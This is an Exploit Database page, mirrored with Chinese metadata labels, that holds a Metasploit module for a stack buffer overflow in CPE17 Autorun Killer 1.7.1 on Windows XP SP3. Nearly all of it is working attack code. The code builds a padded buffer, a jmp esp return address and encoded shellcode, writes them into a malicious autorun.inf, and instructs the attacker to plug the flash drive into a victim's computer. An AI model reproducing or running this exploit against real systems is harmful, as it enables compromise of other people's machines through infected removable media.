CPE17 Autorun Killer 1.7.1 – Local Stack Buffer Overflow (Metasploit)

• Exploit Database
• 17 阅读

• 作者： Xenithz xpt
  日期： 2012-04-27
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18792/

• #
  # CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit
  # by Xelenonz
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  
  include Msf::Exploit::FILEFORMAT
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit',
  'Description'=> %q{
  readfile function is vulnerable it can be overflow
   },
  'Author' => [ 'Xelenonz' ],
  'Version'=> '0.1',
  
  'Payload'=>
  {
  'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
  										'EncoderOptions' => {'BufferRegister'=>'ECX'},
  },
  			'DefaultOptions' =>
  				{
  			'DisablePayloadHandler' => 'true',
  				},
  'Platform' => 'windows',
  
  'Targets'=>
  [
  [
  	'Windows XP SP3',
  		{ 	'Ret' => 0x775a676f, 
  			'Offset' => 500 
  		} 
   ],
  
  ],
  'DefaultTarget' => 0,
  
  'Privileged' => false
  ))
  
  register_options(
  [
  	OptString.new('FILENAME', [ true, 'The file name.','autorun.inf']),
  ], self.class)
   end
  
   def exploit
   	print_status("Encoding Payload ...")
  enc = framework.encoders.create("x86/alpha_mixed")
  		enc.datastore.import_options_from_hash( {'BufferRegister'=>'ESP'} )
  		hunter = enc.encode(payload.encoded, nil, nil, platform)
  		buffer = ""
  buffer << "A"*target['Offset'] # padding offset
  buffer << [target.ret].pack('V') # jmp esp
  buffer << hunter # shellcode
  print_status("Creating '#{datastore['FILENAME']}' file ...")
  file_create(buffer)
  print_status("Plug flashdrive to victim's computer")
  handler
  
   end
  end